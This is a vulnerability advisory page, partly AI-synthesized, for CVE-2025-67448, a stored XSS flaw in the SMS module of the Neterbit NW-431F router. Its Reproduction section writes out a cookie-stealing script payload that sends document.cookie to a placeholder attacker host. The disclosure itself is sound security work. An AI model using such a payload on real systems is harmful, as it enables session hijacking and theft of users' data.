CVE-2025-67448
Description
Neterbit NW-431F Router is vulnerable to stored XSS in its SMS module, allowing attackers to execute code in victim browsers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Neterbit NW-431F Router is vulnerable to stored XSS in its SMS module, allowing attackers to execute code in victim browsers.
Vulnerability
The SMS module in Neterbit NW-431F Router versions 20241014-IR03 and earlier is susceptible to stored Cross-Site Scripting (XSS). The application fails to adequately sanitize user-supplied input within SMS messages before storing and subsequently displaying them. This vulnerability exists in the SMS functionality of the router [1].
Exploitation
An attacker can exploit this vulnerability by sending an SMS message containing a malicious XSS payload to the Neterbit NW-431F Router. The payload will be stored by the router and subsequently executed within the context of a victim's web browser when they view the SMS message through the router's interface. No specific authentication or network position requirements are detailed in the available references, but user interaction is implied by viewing the message [1].
Impact
Successful exploitation of this stored XSS vulnerability allows an attacker to execute arbitrary JavaScript code within the victim's browser. This can lead to various malicious actions, such as session hijacking, stealing sensitive information displayed in the browser, or redirecting the user to malicious websites. The impact is limited to the privileges of the user viewing the SMS message in their browser [1].
Mitigation
The fixed version for this vulnerability is not yet available. Users are advised to check for future firmware updates from Neterbit. No workarounds or EOL status are disclosed in the provided references. The vulnerability has not been listed as actively exploited in the wild [1].
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=20241014-IR03
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The SMS module fails to sanitize user input before storing and displaying it, allowing for stored XSS."
Attack vector
An attacker can send an SMS containing a malicious XSS payload to the router. The application does not properly sanitize this input before storing it. When a victim views the malicious SMS in their inbox, the XSS payload is executed within the victim's browser context [ref_id=1]. This can lead to the theft of sensitive information, such as cookies [ref_id=1].
Affected code
The vulnerability resides in the SMS module of the Neterbit NW-431F Router.
What the fix does
The advisory does not specify a patch or provide details on how the vulnerability is fixed. It states that a fixed version is not available. Users are advised to consult the vendor for remediation guidance.
Preconditions
- inputThe attacker must craft an SMS message containing an XSS payload.
- networkThe attacker must be able to send an SMS to the router.
Reproduction
An attacker composes and sends an SMS with a malicious payload, such as: `<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>`. The victim views the malicious SMS in their inbox. The XSS payload executes, sending the victim's cookies to the attacker's server [ref_id=1].
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.